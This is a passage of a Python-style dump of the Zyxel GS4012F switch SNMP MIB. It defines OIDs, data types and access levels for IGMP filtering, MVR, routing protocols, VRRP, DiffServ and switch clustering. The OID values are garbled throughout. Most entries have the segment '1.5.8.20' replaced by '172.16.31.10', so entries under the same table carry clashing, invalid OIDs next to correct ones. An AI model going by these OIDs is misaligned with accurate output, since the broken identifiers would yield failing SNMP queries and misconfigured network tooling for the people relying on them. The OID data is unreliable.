"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.27.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpFilteringProfileEndAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.27.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpFilteringProfileRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.27.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28",
}, # node
"maxNumberOfMVR" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"mvrTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.2",
"status" : "current",
"description" :
"""""",
}, # table
"mvrEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"mvrVlanID",
],
"description" :
"""An entry in mvrTable.""",
}, # row
"mvrVlanID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""1..4094""",
}, # column
"mvrName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrMode" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.2.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dynamic" : {
"nodetype" : "namednumber",
"number" : "0"
},
"compatible" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvr8021pPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Set the 802.1p priority of control messages within MVR (0~7)""",
}, # column
"mvrPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.3",
"status" : "current",
"description" :
"""""",
}, # table
"mvrPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.3.1",
"status" : "current",
"linkage" : [
"mvrVlanID",
"dot1dBasePort",
],
"description" :
"""An entry in mvrPortTable.""",
}, # row
"mvrPortRole" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.3.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "1"
},
"source_port" : {
"nodetype" : "namednumber",
"number" : "2"
},
"receiver_port" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrPortTagging" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"maxNumberOfMvrGroup" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"mvrGroupTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.5",
"status" : "current",
"description" :
"""""",
}, # table
"mvrGroupEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.5.1",
"create" : "true",
"status" : "current",
"linkage" : [
"mvrVlanID",
"mvrGroupName",
],
"description" :
"""An entry in mvrGroupTable.""",
}, # row
"mvrGroupName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"mvrGroupStartAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.5.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrGroupEndAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.5.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrGroupRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.5.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"layer3Setup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.29",
}, # node
"routerRipState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.29.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"routerIgmpState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.29.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"routerDvmrpState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.29.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"routerDvmrpThreshold" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.29.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"routerIpmcPortSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.30",
}, # node
"routerIpmcPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.30.1",
"status" : "current",
"description" :
"""""",
}, # table
"routerIpmcPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.30.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in routerIpmcPortTable.""",
}, # row
"routerIpmcPortEgressUntagVlan" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.30.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31",
}, # node
"routerVrrpMaxNumber" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Always set it as 14.""",
}, # scalar
"routerVrrpTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2",
"status" : "current",
"description" :
"""""",
}, # table
"routerVrrpEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"routerDomainIpAddress",
"routerDomainIpMaskBits",
"routerVrrpVirtualID",
"routerVrrpUplinkGateway",
],
"description" :
"""An entry in routerVrrpTable.""",
}, # row
"routerVrrpVirtualID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpUplinkGateway" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpPreempt" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpInterval" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""1-255""",
}, # column
"routerVrrpPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""1-254""",
}, # column
"routerVrrpPrimaryVirtualIP" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpSecondaryVirtualIP" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"rpVrrpRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpDomainTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.3",
"status" : "current",
"description" :
"""""",
}, # table
"routerVrrpDomainEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.3.1",
"status" : "current",
"linkage" : [
"routerDomainIpAddress",
"routerDomainIpMaskBits",
],
"description" :
"""An entry in routerVrrpTable.""",
}, # row
"routerVrrpAuthType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.3.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"simple" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpAuthKey" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32",
}, # node
"routerVrrpStatusTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1",
"status" : "current",
"description" :
"""""",
}, # table
"routerVrrpStatusEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1",
"status" : "current",
"linkage" : [
"routerVrrpStatusIpAddress",
"routerVrrpStatusIpMaskBits",
"routerVrrpStatusVirtualID",
],
"description" :
""" """,
}, # row
"routerVrrpStatusIpAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpStatusIpMaskBits" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpStatusVirtualID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpStatusVRStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpStatusUpLinkStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerDomainSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33",
}, # node
"routerDomainTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.1",
"status" : "current",
"description" :
"""""",
}, # table
"routerDomainEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.1.1",
"status" : "current",
"linkage" : [
"routerDomainIpAddress",
"routerDomainIpMaskBits",
],
"description" :
"""An entry in routerDomainTable.""",
}, # row
"routerDomainIpAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.33.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerDomainIpMaskBits" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerDomainVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.33.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerDomainIpTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2",
"status" : "current",
"description" :
"""""",
}, # table
"routerDomainIpEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2.1",
"status" : "current",
"linkage" : [
"routerDomainIpAddress",
"routerDomainIpMaskBits",
],
"description" :
"""An entry in routerDomainIpTable.""",
}, # row
"routerDomainIpRipDirection" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"outgoing" : {
"nodetype" : "namednumber",
"number" : "1"
},
"incoming" : {
"nodetype" : "namednumber",
"number" : "2"
},
"both" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerDomainIpRipVersion" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"v1" : {
"nodetype" : "namednumber",
"number" : "0"
},
"v2b" : {
"nodetype" : "namednumber",
"number" : "1"
},
"v2m" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerDomainIpIgmpVersion" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"igmp_v1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"igmp_v2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"igmp_v3" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerDomainIpDvmrp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"diffservSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34",
}, # node
"diffservState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"diffservMapTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.2",
"status" : "current",
"description" :
"""""",
}, # table
"diffservMapEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.2.1",
"status" : "current",
"linkage" : [
"diffservMapDscp",
],
"description" :
"""An entry in diffservMapTable.""",
}, # row
"diffservMapDscp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""0-63""",
}, # column
"diffservMapPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0-7""",
}, # column
"diffservPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.3",
"status" : "current",
"description" :
"""""",
}, # table
"diffservPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.3.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in diffservPortTable.""",
}, # row
"diffservPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"clusterSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35",
}, # node
"clusterManager" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1",
}, # node
"clusterMaxNumOfManager" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"clusterManagerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.2",
"status" : "current",
"description" :
"""""",
}, # table
"clusterManagerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"clusterManagerVid",
],
"description" :
"""An entry in clusterManagerTable.""",
}, # row
"clusterManagerVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterManagerName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"clusterManagerRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"clusterMembers" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2",
}, # node
"clusterMaxNumOfMember" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"clusterMemberTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"clusterMemberEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.2.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"clusterMemberMac",
],
"description" :
"""An entry in clusterMemberTable.""",
}, # row
"clusterMemberMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"clusterMemberName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterMemberModel" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterMemberPassword" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"clusterMemberRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"clusterCandidates" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.3",
}, # node
"clusterCandidateTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.3.1",
"status" : "current",
"description" :
"""""",
}, # table
"clusterCandidateEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.3.1.1",
"status" : "current",
"linkage" : [
"clusterCandidateMac",
],
"description" :
"""An entry in clusterCandidateTable.""",
}, # row
"clusterCandidateMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.3.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
